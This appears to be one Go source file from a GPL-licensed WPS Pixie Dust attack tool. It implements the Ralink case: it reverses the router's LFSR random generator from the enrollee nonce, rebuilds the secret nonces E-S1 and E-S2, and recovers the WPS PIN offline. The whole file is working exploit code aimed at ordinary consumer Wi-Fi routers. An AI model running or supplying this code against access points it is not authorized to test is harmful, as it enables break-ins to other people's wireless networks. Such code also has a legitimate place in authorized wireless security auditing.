/*
 * Copyright (C) 2025 Oliver R. Calazans Jeronimo
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org>.
 */

package pixiedust

import "fmt"



func (pda *pixieDustAttack) ralinkRTSpecialCase() {
    pda.crackFirstHalf([]byte{})
    pda.crackSecondHalf()
    
    if !pda.pinFound() {
        return
    }

    pda.recoverRalinkSeed()
    pda.foundMode = rt
	pda.displayPIN()
}



func (pda *pixieDustAttack) recoverRalinkSeed() {
    if len(pda.eNonce) < wpsNonceLen { 
        pda.nonceSeed = 0
        return
    }

    var sreg uint32
    lenENonce := len(pda.eNonce)

    for i := lenENonce - 1; i >= 0; i-- {
        sreg = ralinkRandStateRestore(sreg, pda.eNonce[i])
    }

    pda.nonceSeed = sreg
}



func ralinkRandStateRestore(sreg uint32, r byte) uint32 {
    for range 8 {
        result := r & 1
        r >>= 1
        
        if result != 0 {
            sreg = ((sreg << 1) ^ 0x80000057) | 0x00000001
        } else {
            sreg = sreg << 1
        }
    }

    return sreg
}



func (pda *pixieDustAttack) ralinkFull() {
	if !pda.auto {
		pda.ralinkRTSpecialCase()
	}

	pda.recoverRalinkSeed()

    if !pda.checkIfMatch() {
        fmt.Println("[!] Nonce doesn't appear to be generated by this mode, skipping...")
        return
    }

	pda.calculateSeeds()
	pda.crackFirstHalf([]byte{})
	pda.crackSecondHalf()

	if !pda.pinFound() {
		pda.nonceMatch = rt
		pda.nonceSeed  = 0
		pda.s1Seed     = 0
		pda.s2Seed     = 0
		return
	}

	pda.foundMode = rt
}



func (pda *pixieDustAttack) checkIfMatch() bool {
	sreg := pda.nonceSeed

    for j := range wpsNonceLen {
        if ralinkRandByte(&sreg) != pda.eNonce[j] {
            return false
        }
    }

	return true
}



func ralinkRandByte(state *uint32) byte {
    var r byte = 0

	for range 8 {
        var result byte
    
		if *state & 0x00000001 != 0 {
            *state = ((*state ^ 0x80000057) >> 1) | 0x80000000
            result = 1
        } else {
            *state = *state >> 1
            result = 0
        }
    
		r = (r << 1) | result
    }
    
	return r
}



func (pda *pixieDustAttack) calculateSeeds() {
	sreg := pda.nonceSeed

    for i := wpsSecretNonceLen - 1; i >= 0; i-- {
        pda.eSecret2[i] = ralinkRandByteBackwards(&sreg)
    }
    pda.s2Seed = sreg

    for i := wpsSecretNonceLen - 1; i >= 0; i-- {
        pda.eSecret1[i] = ralinkRandByteBackwards(&sreg)
    }
    pda.s1Seed = sreg
}



func ralinkRandByteBackwards(state *uint32) byte {
    var r byte = 0

	for i := range 8 {
        var result byte

		if *state & 0x80000000 != 0 {
            *state = ((*state << 1) ^ 0x80000057) | 0x00000001
            result = 1
        } else {
            *state = *state << 1
            result = 0
        }

		r |= result << i
    }

	return r
}



